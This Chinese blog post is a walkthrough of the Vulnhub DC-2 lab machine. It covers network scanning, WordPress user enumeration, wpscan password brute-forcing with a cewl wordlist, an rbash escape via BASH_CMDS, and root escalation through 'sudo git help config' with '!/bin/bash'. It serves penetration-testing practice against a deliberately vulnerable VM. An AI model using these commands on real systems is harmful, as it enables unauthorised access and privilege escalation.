【DC系列】DC-2靶机渗透教程

最新推荐文章于 2025-02-06 16:02:40 发布
最新推荐文章于 2025-02-06 16:02:40 发布
阅读量1k 收藏 27
点赞数 8
分类专栏: 【Web渗透】Vulnhub_DC系列 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_83116349/article/details/145236462
版权

文章目录

环境搭建

VMware和Kali Linux的环境搭建

VMware和Kali Linux的环境搭建我在这里就不说了,具体各种参考我这篇博客

DC-2靶机的搭建

老样子,直接打开这个链接,浏览器就会自动下载DC-2压缩包了
https://download.vulnhub.com/dc/DC-2.zip
这里的具体安装教程就不多说了,可以参考上篇博客

渗透教程

tips:启动的时候可能会显示无法连接ide:0,直接点就行了

接下来开始渗透

收集信息

首先打开命令行,查看kali的ip地址

ip a

我的本机ip是192.168.3.42,然后进行网段扫描

netdiscover -r 192.168.3.0/24#这边的ip是你的ip最后变成0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                            
                                                                                                                                                                                                                                          
 7 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 420                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 ************    *****************      3     180  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                                                                            
 ************    *****************      1      60  Shenzhen JMicron Intelligent Technology Developmen                                                                                                                                     
 ************    *****************      1      60  Luxshare Precision Industry Co., Ltd                                                                                                                                                   
 192.168.3.46    00:0c:29:41:db:6d      1      60  VMware, Inc.                                                                                                                                                                           
 ************    *****************      1      60  Unknown vendor                                                                                                                                                                         

zsh: suspended  sudo netdiscover -r 192.168.3.0/24

可以看到,目标靶机DC-2的ip是192.168.3.46
接下来进行nmap探测

nmap 192.168.3.46 -p- -A

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 06:30 EST
Nmap scan report for dc-2 (192.168.3.46)
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds

可以看到,目标开放了80网页端口7744ssh端口,先访问一下80端口
80端口

flag1

网页无法被访问,那么我们就要考虑重定向了,也就是说,我们需要更改hosts文件
Windows下的hosts文件位置:C:\Windows\System32\drivers\etc\hosts
Linux下的hosts文件位置:/etc/hosts
为了方便后续渗透,我在Kali中修改

sudo vim /etc/hosts

vim
然后我们按下i键,左下角会显示一个[插入],然后输入以下内容

192.168.3.46 dc-2	ip是靶机的ip

vim
然后我们按esc键,再直接输入:wq,就可以了,然后刷新一下网页,是WordPress
dc-2
然后直接查看flag1
flag1
翻译过来就是:你常用的单词表可能不管用了,所以,或许你只需要很酷(cewl)。密码越多越好,但有时候你可能无法赢得全部。以一个用户身份登录以查看下一个标志。如果你找不到它,就尝试以另一个用户身份登录。
没大看懂,但是有cewl关键词,这是一个字典生成工具
cewl
但是我们要找到登录界面

开始渗透

flag3

用nikto进行探测
nikto
扫描出来后,不难发现,下面有一个WordPress的登录界面的网址

+ /wp-login.php: Wordpress login found.

直接访问
wp-login.php
成功!然后就可以进行字典生成了

cewl http://dc-2 -w ./passwords.txt #passwords.txt名称自订

有了密码,还需要账户,这就需要用到WPScan
WPScan
接下来枚举用户名

wpscan --url http://dc-2 -e u

用户名
成功爆出用户名,给它写到一个文件里面

touch ./users.txt
vim ./users.txt
#users.txt文件名自定

然后按照更改hosts文件的方法,将用户名写到里面

admin
jerry
tom

然后用wpscan进行爆破

wpscan --url http://dc-2 -U ./users.txt -P ./passwords.txt

然后就等待爆用户和密码
用户和密码
然后尝试登录
jerry
在jerry中发现了flag2
flag2
翻译过来就是:如果你无法利用WordPress找到捷径,还有另一种方法。希望你能找到另一个切入点。
这flag还不如没有

flag3

直接尝试ssh登录

ssh jerry@192.168.3.46 -p 7744#192.168.3.46是靶机ip
ssh tom@192.168.3.46 -p 7744#192.168.3.46是靶机ip

因为dc-2不是默认的22ssh端口,所以最后要加上-p 7744,代表ssh端口是7744
jerry没法登,tom可以

tom@DC-2:~$ ls
tom@DC-2:~$ cat flag3.txt

flag3.txt
发现有rbash限制
rbash限制
但是可以用vi啊[doge]

vi ./flag3.txt

flag3
flag3翻译
良心的Kimi啊,直接提示了su命令,可能有限制,但先试试

su jerry

-rbash限制
果然,那就要上rbash逃逸了

flag4

BASH_CMDS[r]=/bin/bash	#设置一个变量为r
r	#执行这个变量

rbash逃逸1
然后设置环境变量

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

rbash逃逸成功
成功!
直接查看flag4
flag4
翻译一下
翻译
真文明,还配个笑脸 :) 咋感觉有点眼熟
Windows10蓝屏
咳咳,扯远了

final-flag

flag中有一个提示词git,那么应该就是git提权,看下git是不是SUID命令

sudo -l

SUID
可以看到有git,直接提权

sudo git help config

然后输入!/bin/bash
git提权
然后

cd ~
ls
cat final-flag.txt

final-flag

DC系列DC-2渗透测试
qq_45392044的博客
12-24 1167
其实正常情况下来讲,打开浏览器我们输入IP地址的时候,实际上地址栏不应该直接跳到dc-2,如果想正确的访问dc-2这样一个web应用,需要给一个本地的解析,否则访问不了!除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下kali虚拟机的host文件。我们可能在渗透测试或者是攻防演练的过程中,我们需要做一个信息收集,我们往往很多的信息都是放在我们网页里面的。写的,它是WordPress模板,WordPress是我们开源的cms的PHP编写的。
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2705
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2靶机渗透测试详细教程
啊醒的博客
05-04 1138
DC-2靶机渗透测试详细教程
DC-2靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-25 897
文章目录前言一、DC-2 收集信息1.确定目标IP,以及端口号2.进入登陆界面二、使用步骤1.引入库2.读入数据总结 前言 之前进行了DC-1的攻略有兴趣的可以点击去看一下 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-2 收集信息 简单介绍:这次的靶机渗透是一个找寻DC-2靶机中的flag的过程,以最终的flag为目标。 1.确定目标IP,以及端口号 通过nmap -sP扫描网段最终确定IP为192.168.48.132,端口号开放80、7744。 2.进入登陆界面 二、使用步骤 1.引
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 2043
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 3114
DC-2靶机渗透测试思路及流程
DC-2靶机详解
苏生要努力
03-03 1567
写写自己打DC-2的过程使用工具DC-2靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3403
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-2靶机进行渗透测试
zll___的博客
03-11 1124
DC-2靶机进行渗透测试
DC系列DC-2靶机实战详细讲解
weixin_44681307的博客
06-28 526
wpscan --url http://dc-2/ --enumerate u 可以查找这个网站有什么用户名,这样我们用户名也就都有了。然后我们打开网站,在Flag看到了提醒,就是告诉我们只需要cewl扫描出来的字典就行,密码都在这里面。进去后我们发现好多命令都不能用,甚至cd都不能用,经过尝试发现vi这个命令可以用,less也可以用。cewl http://dc-2 (-d 目录深度,默认是2.-w 写到一个文件中)这时候执行这个代码,命令权限就有了,原本su命令是不能用的,现在就可以用了。
DC-2靶机
Flamingo1998的博客
02-09 280
DC-2靶机
靶场DC-2靶机详解
2401_84693966的博客
09-27 1531
与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。看到了,访问不到且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
DC系列打穿靶机DC-2靶机妈生教程
m0_53419560的博客
11-20 819
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。本文主要讲解了渗透测试中的完整渗透测试流程,主要介绍了【wpscan】、【cewl】、【rbash逃逸】、【git提权】的使用技巧。靶机下载链接:https://download.vulnhub.com/dc/DC-2.zip。
DC-2靶机详解,2024年最新2024网络安全架构面试指南
2301_82101171的博客
04-13 424
接下来使用一个工具 WPScan,同样 kali 自带爆破结果,存在2个账户这里可以用dirb工具扫一下有哪些可以登录的页面使用账号 jerry 登录后可以发现 flag2说人话flag 提示,如果 wordpress 打不下来,就得换一个入口上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。
靶机DC-2 WP
m0_66638011的博客
05-13 904
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
DC-2靶机渗透学习记录
tyut_dummy的博客
07-14 2025
1)根据flag3提示,我们应该进行提权,切换为jerry用户,但是shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功su jerry。1)根据flag2提示,我们要去寻找其他攻击渗透点,所以我们把目光放到靶机的第二个端口7744端口。打开了一个shell(部分功能依旧不可用),进入/home/jerry目录下查看文件flag4.txt。1)根据flag1提示,我们使用cewl工具,提取网页中关键词,生成密码字典。3)进入/root目录查看最终flag文件,完成DC-2靶机渗透
DC-2靶机渗透测试全过程
最新发布
2401_88083440的博客
02-06 981
(1)本来这里想做一下痕迹清除的,但看了很多日志发现并没有我们攻击机的记录(感觉很奇怪)(2)通过DC-2靶机,学习到的知识有:WordPress WPScan Cewl 以及绕过rbash,希望我能再多掌握一些工具(3)并且还回顾了一下痕迹清除这块有问题的地方欢迎各位师傅提出!
实战受挫虐靶机DC-2
Jietewang的博客
08-15 380
前言 已经有一段时间没有搞站了,因为一个人要管一整个某个***云的安全加运维,有时候真的有一些负面的情绪,难道所谓的奋斗就是把趁着年轻多做一些脏活累活吗?以甲方为主的目的是尽全力去实现他们要求的业务需求,不是外包的保姆机构。那就假装日个站吧!!!!!! 1.靶机环境介绍 本靶机是由著名的靶机提供商vulnhub提供,官网连接请点击(https://www.vulnhub.com/),想做就去找吧,这里面啥靶机都有。 本靶机镜像地址:https://www.vulnhub.com/entry/dc-2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值